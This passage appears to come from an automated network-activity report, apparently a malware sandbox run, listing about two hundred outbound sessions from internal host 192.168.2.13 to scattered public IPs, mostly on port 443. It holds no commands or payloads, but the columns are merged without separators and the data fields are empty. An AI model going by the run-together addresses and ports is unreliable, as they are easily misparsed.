                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21325192.168.2.1356330173.54.144.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21326192.168.2.1333738150.159.194.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21327192.168.2.135053651.191.253.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21328192.168.2.1349510147.50.151.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21329192.168.2.1342500217.123.229.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21330192.168.2.135892649.236.196.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21331192.168.2.1345268128.1.101.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21332192.168.2.133481293.197.182.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21333192.168.2.1360150109.67.147.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21334192.168.2.1357782204.19.233.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21335192.168.2.1354370140.160.57.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21336192.168.2.134401281.36.246.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21337192.168.2.135940678.19.87.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21338192.168.2.134210493.142.213.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21339192.168.2.135790293.127.157.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21340192.168.2.1345198122.70.57.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21341192.168.2.1343876158.100.36.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21342192.168.2.1338644138.19.81.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21343192.168.2.1346558218.49.113.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21344192.168.2.1351750196.190.51.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21345192.168.2.1333948173.249.57.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21346192.168.2.1351854102.213.185.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21347192.168.2.135832425.31.21.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21348192.168.2.13501965.244.18.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21349192.168.2.1342702181.249.34.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21350192.168.2.1353600170.49.114.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21351192.168.2.1355818189.81.122.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21352192.168.2.1339110185.182.94.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21353192.168.2.1358502159.127.91.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21354192.168.2.133458427.0.221.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21355192.168.2.134923493.112.116.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21356192.168.2.1348922113.114.27.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21357192.168.2.1356194168.36.105.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21358192.168.2.135229099.225.135.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21359192.168.2.1341458157.203.183.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21360192.168.2.1346538144.151.10.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21361192.168.2.1357708142.247.236.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21362192.168.2.1338192125.221.51.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21363192.168.2.135844258.148.23.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21364192.168.2.1339846188.200.177.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21365192.168.2.1337422165.15.176.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21366192.168.2.134226472.66.238.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21367192.168.2.133798434.143.167.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21368192.168.2.1345402209.71.149.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21369192.168.2.1350530116.253.151.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21370192.168.2.1333514101.12.213.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21371192.168.2.135323648.221.255.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21372192.168.2.1353824182.194.51.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21373192.168.2.1335486209.115.50.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21374192.168.2.134486459.104.2.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21375192.168.2.1350732169.10.24.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21376192.168.2.135400650.233.95.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21377192.168.2.1335126189.224.1.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21378192.168.2.135603224.230.24.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21379192.168.2.135927261.66.222.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21380192.168.2.135564432.50.75.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21381192.168.2.133486465.7.200.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21382192.168.2.1360024179.213.211.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21383192.168.2.133454434.112.14.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21384192.168.2.1336352216.59.27.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21385192.168.2.1336422101.6.229.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21386192.168.2.133915278.186.145.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21387192.168.2.133528242.207.177.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21388192.168.2.1360356162.229.20.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21389192.168.2.1346772148.142.96.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21390192.168.2.1348668128.69.164.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21391192.168.2.1344794175.247.221.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21392192.168.2.1335544132.127.74.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21393192.168.2.1342980143.91.200.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21394192.168.2.134331636.116.87.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21395192.168.2.1354722182.106.121.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21396192.168.2.135750264.248.81.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21397192.168.2.1358664143.25.2.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21398192.168.2.133629669.248.108.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21399192.168.2.133349872.167.231.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21400192.168.2.1346594130.196.116.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21401192.168.2.1356010128.121.252.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21402192.168.2.136099851.27.91.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21403192.168.2.1340954168.66.123.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21404192.168.2.1350414122.0.198.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21405192.168.2.135721052.35.240.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21406192.168.2.135204871.35.188.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21407192.168.2.1348904126.246.105.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21408192.168.2.133956637.171.90.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21409192.168.2.134493225.28.55.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21410192.168.2.1347940209.183.130.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21411192.168.2.1355678167.23.60.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21412192.168.2.134243664.23.210.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21413192.168.2.135758437.224.198.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21414192.168.2.135460093.185.150.318080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21415192.168.2.134730080.239.99.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21416192.168.2.1337160180.255.7.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21417192.168.2.1340120193.18.205.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21418192.168.2.134530695.198.41.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21419192.168.2.135237243.232.190.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21420192.168.2.1335988193.46.170.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21421192.168.2.136050281.248.254.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21422192.168.2.1334712165.82.75.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21423192.168.2.1333376137.36.234.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21424192.168.2.135869049.209.134.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21425192.168.2.1344352149.55.49.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21426192.168.2.1349364189.25.42.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21427192.168.2.134132223.109.61.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21428192.168.2.135637894.223.65.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21429192.168.2.133687469.209.232.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21430192.168.2.1341048103.255.18.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21431192.168.2.1344334185.222.255.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21432192.168.2.1355484166.16.16.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21433192.168.2.1354668150.163.28.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21434192.168.2.1350304152.245.230.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21435192.168.2.1340266125.164.242.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21436192.168.2.135068847.117.114.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21437192.168.2.134253863.181.64.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21438192.168.2.1358042130.75.68.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21439192.168.2.1352238178.78.158.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21440192.168.2.135504494.127.167.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21441192.168.2.1350596115.120.126.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21442192.168.2.1333388189.172.28.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21443192.168.2.1332930208.50.174.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21444192.168.2.1333220194.85.243.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21445192.168.2.133496280.196.95.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21446192.168.2.1342546136.3.16.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21447192.168.2.1356796217.3.76.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21448192.168.2.135329213.212.191.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21449192.168.2.133293498.36.220.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21450192.168.2.1341414158.50.248.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21451192.168.2.134048261.180.189.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21452192.168.2.1355724143.116.22.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21453192.168.2.1338834192.230.137.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21454192.168.2.1338122133.103.1.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21455192.168.2.1334704182.82.250.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21456192.168.2.1346004168.241.211.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21457192.168.2.1345176100.160.126.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21458192.168.2.134866262.95.180.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21459192.168.2.1357792165.3.221.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21460192.168.2.1347094149.13.110.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21461192.168.2.1348342178.144.162.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21462192.168.2.1344930120.3.247.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21463192.168.2.1348678138.16.29.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21464192.168.2.1358206186.119.171.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21465192.168.2.135173886.4.151.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21466192.168.2.1343700134.22.176.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21467192.168.2.135986698.170.167.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21468192.168.2.1347586144.254.252.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21469192.168.2.134660044.88.203.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21470192.168.2.1348450175.84.6.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21471192.168.2.1355624167.2.244.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21472192.168.2.1344606171.107.142.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21473192.168.2.1345454152.235.2.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21474192.168.2.134542670.244.58.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21475192.168.2.1357590136.130.139.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21476192.168.2.1339818119.133.150.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21477192.168.2.1335036186.125.111.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21478192.168.2.1355008218.31.192.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21479192.168.2.134393049.70.69.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21480192.168.2.1355648103.121.164.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21481192.168.2.1340398155.244.49.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21482192.168.2.1348850131.26.212.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21483192.168.2.135893882.166.237.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21484192.168.2.1349812192.125.170.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21485192.168.2.1354076126.146.87.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21486192.168.2.135790651.163.160.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21487192.168.2.1344048124.248.133.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21488192.168.2.1347482189.95.198.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21489192.168.2.134412089.47.48.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21490192.168.2.1334030218.39.231.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21491192.168.2.1357986113.32.216.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21492192.168.2.1353022208.34.30.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21493192.168.2.1345140121.133.96.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21494192.168.2.133771671.71.52.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21495192.168.2.1343282208.5.111.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21496192.168.2.1350992151.126.88.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21497192.168.2.135403642.118.47.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21498192.168.2.1333872138.121.78.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21499192.168.2.1340038105.20.103.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21500192.168.2.1350988201.154.135.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21501192.168.2.136033891.123.164.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21502192.168.2.1343796168.110.177.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21503192.168.2.1346018212.223.78.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21504192.168.2.13419501.140.101.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21505192.168.2.133536837.141.165.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21506192.168.2.134285849.241.186.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21507192.168.2.1342504103.102.41.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21508192.168.2.1347908155.184.143.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21509192.168.2.1360702161.43.41.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21510192.168.2.135516227.112.254.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21511192.168.2.1358668181.182.9.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21512192.168.2.1347754126.90.75.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21513192.168.2.133503458.233.63.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21514192.168.2.1360712153.219.225.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21515192.168.2.1339290103.125.142.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21516192.168.2.1341140213.143.207.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21517192.168.2.1360464186.172.231.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21518192.168.2.1355790143.186.51.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21519192.168.2.1332912176.252.163.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21520192.168.2.1334852130.163.80.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21521192.168.2.135624483.239.189.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21522192.168.2.135931078.48.124.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21523192.168.2.1350648104.117.65.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21524192.168.2.1348216152.10.90.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21525192.168.2.135149831.25.211.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21526192.168.2.1358558144.240.240.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21527192.168.2.1337448211.45.95.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21528192.168.2.134856483.145.156.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21529192.168.2.1340186204.115.255.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21530192.168.2.1347050190.69.220.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21531192.168.2.135502650.162.162.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21532192.168.2.1345626134.89.180.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21533192.168.2.134181432.121.134.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21534192.168.2.134882812.244.93.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21535192.168.2.1354480122.212.16.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21536192.168.2.133979480.48.181.85443
                                                  TimestampBytes transferredDirectionData


